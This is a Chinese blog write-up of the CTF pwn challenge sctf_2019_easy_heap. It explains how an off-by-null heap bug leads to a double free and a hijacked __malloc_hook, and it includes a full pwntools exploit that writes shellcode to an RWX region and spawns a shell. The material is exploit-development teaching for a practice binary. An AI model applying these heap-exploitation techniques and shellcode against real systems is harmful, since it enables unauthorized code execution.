sctf_2019_easy_heap(off by null,unlink造成doublefree)

最新推荐文章于 2024-03-16 19:26:53 发布
最新推荐文章于 2024-03-16 19:26:53 发布
阅读量438 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121411787
版权

sctf_2019_easy_heap:

保护全开请添加图片描述

程序分析:

给我们mmap了一段可读可写可执行的区域,还告诉了我们地址
请添加图片描述
add里告诉了我们堆地址请添加图片描述
其他都挺常规的,delete也释放干净了

漏洞分析:

有个off by null
请添加图片描述

利用思路:

1.利用漏洞off-by-null造成unlink合并,再申请回来,指针数组里就有两个指针指向同一块地方,我们delete两次就造成了doublefree
2.我们用doublefree往mmap的地方写shellcode
3.再用off-by-null造成unlink合并,再申请回来,使unsortbin里的malloc_hook+96的地址挂在已经free状态的fd里,我们改成malloc_hook,然后申请到malloc_hook里填入mmap的地址
4.最后add触发

exp:

from pwn import *
#from LibcSearcher import * 
local_file  = './sctf_2019_easy_heap'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',26143 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#---------------------------
def add(size):
    sla('>> ','1')
    sla('Size: ',str(size))
    ru('Pointer Address 0x')
    return int(rc(12),16)
def delete(index):
    sla('>> ','2')
    sla('Index: ',str(index))
def edit(index,content):
    sla('>> ','3')
    sla('Index: ',str(index))
    sa('Content: ',content)
#---------------------------------
ru('Mmap: 0x')
mmap=int(rc(10),16)
print hex(mmap)
add(0x410)#0
add(0x58)#1
add(0x500-0x10)#2
add(0x58)#3
delete(0)
edit(1,'a'*0x50+p64(0x60+0x420))
delete(2)
add(0x410)#0
add(0x58)#1
delete(3)#not bin_index to -1
delete(1)
delete(2)
add(0x58)
edit(1,p64(mmap)+'\n')
add(0x58)
add(0x58)
shellcode = asm(shellcraft.sh())
edit(3,shellcode+'\n')
#-------------------------
add(0x4f0)
delete(0)
edit(1,'a'*0x50+p64(0x60+0x420))
delete(1)
delete(4)
add(0x410)
edit(2,p8(0x30)+'\n')
add(0x58)
add(0x58)
edit(4,p64(mmap)+'\n')
sla('>> ','1')
sla('Size: ',str(0x1))
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sctf_2019_easy_heap
fayinq的博客
04-20 273
sctf_2019_easy_heap 保护全开,所以又只能修改__malloc_hook,或者说__free_hook了。 函数分析: main函数 add函数 Free函数 Edit函数 下面的函数中有一个off-by-one的漏洞,所以我们可以很自然的想到overlap 思路 首先,程序在运行的时候泄露了一段Mmap的地址,至于给了一个地址,那一定是有用的东西,这里可以思考,是不是可以直接往里面写一段shellcode,然后把__free_hook或者说__malloc_hook改成前面的
BUUCTF:sctf_2019_easy_heap
weixin_51055545的博客
01-04 1297
例行检查一下程序: 64位的一道堆题,放到IDA中看下: 首先看到一个菜单:
Buuoj sctf_2019_easy_heap
u014377094的博客
03-12 636
大佬博客传送门:sctf_2019_easy_heap - LynneHuan - 博客园 (cnblogs.com) 知识更新: 1.你需要了解一下off-by-one,unlink,overlapping是啥 传送门在这里:堆中的 Off-By-One - CTF Wiki (ctf-wiki.org) 2.了解一下chunk 空间的共用情况,也就是下一个的 chunk 的 prev_size 域给当前 chunk 当做数据域使用,这 种情况只出现在 malloc 的大小为 8 的奇数倍(32
sctf_2019_easy_heap off-by-null劫持IO_FILE,理解 0ctf2015 free_note unsortedbin-double_free使用
weixin_46521144的博客
08-14 311
分析以及漏洞点 本身off-by-null没什么可以再说的,但是这道题没有show函数,就必须想到要劫持IO_FILE。但是之前就一直有个问题就是既然unsortedbin中地址无法取出,怎么能写到tcache或者fastbin中?之前许多题目因为正好有类似的漏洞,但感觉不是很普世。这次只有一个off-by-null就实现了这一点,因此看完之后恍然大悟。明白了一般性的劫持IO_FILE泄露libc的方法。 关键点:构造chunk overlapping,之后用一个大的unsortedbin包裹住这个chun
java版sm4源码-SCTF2019-Write-Up:SCTF2019报道
06-04
SCTF 2019 官方 Write-Up Misc 签到 出题人: XXX 解题人数: 260 最终分数:71 [removed]/9j/4QBkRXhpZgAATU0AKgAAAAgABYdp... 给了个图片的base64编码,某些浏览器可能渲染会截断,本来想放hint提示浏览器问题,但是...
spn.rar_SSTF
09-23
- 主程序部分,用于调用SCTF算法并输出结果。 **pudn.txt文本说明:** `pudn.txt`文件可能是实验指导或者说明文档,可能包含了实验目的、步骤、预期结果等内容。为了更好地理解SSTF算法的实验,你需要阅读此文件,...
SCTF2020:SCTF2020
04-01
【SCTF2020:一场聚焦Java技术的网络安全挑战】 SCTF2020,全称为“SCTF2020网络安全技术挑战赛”,是一个专注于信息技术安全领域的年度竞赛,尤其强调了Java技术的应用。这个比赛旨在检验参赛者在Java编程、网络...
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
SCTF差分晶振15013896510
06-21
SCTF差分晶振15013896510 SCTF差分晶振15013896510是一款差分晶振器件,提供了高频率稳定性和低抖动特性,适用于高速应用场景。 电气参数: * 频率:106.25、125、155.52、161.1328、187.5、312.5MHz * 频率稳定...
BUUCTF-PWN roarctf_2019_easyheap(double free, stdout重定向)
weixin_44145820的博客
04-23 771
这里写目录标题题目分析漏洞利用Exp 题目分析 有添加,删除,展示三个主要功能,不过添加有次数限制,同时限制了申请大小,使得我们不能申请出unsorted bin范围内的chunk 删除之后没有置空,可以多次free show功能有条件限制,而且会把stdout关了 添加和后门的次数 后门函数可以进行calloc和free,同样没有置空,但是后门函数的次数限制逻辑有问题,即使为0还会再...
buuctf [ZJCTF 2019]EasyHeap
weixin_45677731的博客
08-24 912
这题只有add,edit,delete三个主体部分,没有show的部分 create_heap函数,chunk的指针保存在bss段的heaparray数组处 edit_heap函数,注意这里输入的数据长度是可以自己设置的,就可以随意溢出了 delete_heap函数 除此之外,还有这样一个l33t函数: 在程序中,你只要满足一定的条件,是可以运行这个函数的,我猜测在[ZJCTF 2019]比赛进行的时候可能这个函数是可以利用的,但现在在buu上面是用不了的,flag文件的目录不对。不过,这个sys
【Pwn】NCTF2019 easy_heap
Nothing
11-29 563
查看程序保护。 分析程序,漏洞在free之后指针没置0,导致uaf;堆的分配大小做了限制0x50该变量在bss段上,刚好bss段上存放了用户名信息,所以先考虑在bss上伪造堆块,进行一次fastbinattack,分配到bss段,修改限制大小,去掉限制之后就是常规操作了,unsortbin泄露libc,再进行一次fastbinattack,getshell。 from pwn import * ...
堆上的off-by-one+unlink
qq_41252520的博客
08-31 466
off-by-one 由于对字符串长度校验不恰当,导致写入数据的时候多写了一个字节,这种情况就叫做 off-by-one 。 正所谓一个巴掌拍不响, off-by-one 也是,必须要结合其他的漏洞或者程序的具体实现才能真正构成威胁 off-by-one 有两种形式: (1)多写入一个任意字节,示例代码: for(int i=0;i<=len;i++){ read(0,buf[i],1...
[pwn]堆:熟练掌握double free+unlink
Breeze的博客
09-06 9001
double free+unlink 4-ReeHY-main-100 writeup 一道经典的堆溢出题目4-ReeHY-main-100 题目分析 江湖规矩,先看安全策略: 还可以,没有full relro说明可以修改got表。然后看看程序的逻辑: 一看到菜单基本就是堆得题目没跑了,然后IDA查看反汇编代码: create函数(我改名后): 整个create函数充斥着符号溢出的味道… 然...
高版本libc_off_by_null(一看就懂)
最新发布
qq_41683953的博客
03-16 984
在libc2.29之后新增保护,区别与普通的off_by_null会判断pre_size和要合并的chunk_size是否相同普通的off_by_null只需要修改pre_inuse和pre_size即可完成重叠但是现在需要修改前一个的chunk_size这个显然不可能,那就只能自己伪造chunk。
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 606
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
buuctf_roarctf_2019_easyheap离谱的一题
qq_43766802的博客
09-29 621
首先例行公事,用checksec检查一下函数的保护措施,发现除了pie保护全开,但此题不需要泄漏程序加载地址,是个好事 查看一下函数逻辑,程序一开始我们可以向内存区域的某一块输入数据,接下来就是heap的经典菜单栏,add函数允许我们创建任意大小的buf,但只有一个指针,free时没有删除指针,可以double free,当我们输入666时程序允许我们添加和free一个大小固定的chunk给ptr,这个ptr其实没什么用,主要用来给自定义大小的buf double free做道具用,show函数只有当
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统: ``` sudo yum install libstdc++.so.6 ``` 请注意,根据你使用的操作系统和软件包管理器,命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器,并根据你的情况进行相应的调整。如果问题仍然存在,请提供更多的上下文信息,以便我可以提供更具体的解决方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值